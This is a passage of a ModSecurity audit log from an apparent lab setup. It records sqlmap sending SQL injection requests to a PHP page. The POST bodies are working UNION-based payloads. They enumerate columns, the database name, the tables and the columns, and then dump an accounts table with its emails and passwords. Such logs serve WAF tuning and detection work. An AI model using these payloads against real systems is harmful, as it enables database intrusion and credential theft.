[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM5ZCUAAAAF 192.168.56.102 49588 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 30
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%207--%20YduW
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 524
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814644355 30939 (- - -)
Stopwatch2: 1493232814644355 30939; combined=22, p1=0, p2=17, p3=0, p4=0, p5=4, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM2g@AAAAAE 192.168.56.102 49590 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 198
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2C0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL--%20LZEc
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 780
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814672135 6497 (- - -)
Stopwatch2: 1493232814672135 6497; combined=16, p1=1, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABMzHvcAAAAB 192.168.56.102 49592 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 383
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2C0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2C0x4b464e787a6e504f72424d4f4d414d4b685a4a4672794f5a68445a5146514a684d6a7665564c4275%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL--%20WhCn
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 883
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814689876 12543 (- - -)
Stopwatch2: 1493232814689876 12543; combined=18, p1=1, p2=14, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM02A4AAAAC 192.168.56.102 49594 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 171
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2CIFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL--%20Ofoj
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 719
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814747875 3061 (- - -)
Stopwatch2: 1493232814747875 3061; combined=14, p1=1, p2=11, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABMySGIAAAAA 192.168.56.102 49596 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 253
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2CIFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x746573746462%29--%20yUec
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 771
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814770663 4502 (- - -)
Stopwatch2: 1493232814770663 4502; combined=18, p1=1, p2=13, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM1cLMAAAAD 192.168.56.102 49598 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 356
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2CIFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28column_type%20AS%20CHAR%29%2C0x20%29%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x6163636f756e7473%20AND%20table_schema%3D0x746573746462--%20pnRR
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 902
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814787059 8518 (- - -)
Stopwatch2: 1493232814787059 8518; combined=21, p1=0, p2=16, p3=0, p4=0, p5=4, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM5ZCYAAAAF 192.168.56.102 49600 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 560
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b767171%2CIFNULL%28CAST%28account_added%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28account_email%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28account_id%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28account_lastactive%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28account_pass%20AS%20CHAR%29%2C0x20%29%2C0x617a776a7a6e%2CIFNULL%28CAST%28role_id%20AS%20CHAR%29%2C0x20%29%2C0x716a787a71%29%2CNULL%2CNULL%2CNULL%20FROM%20testdb.accounts--%20XVAV
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 948
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814813976 3788 (- - -)
Stopwatch2: 1493232814813976 3788; combined=17, p1=0, p2=14, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

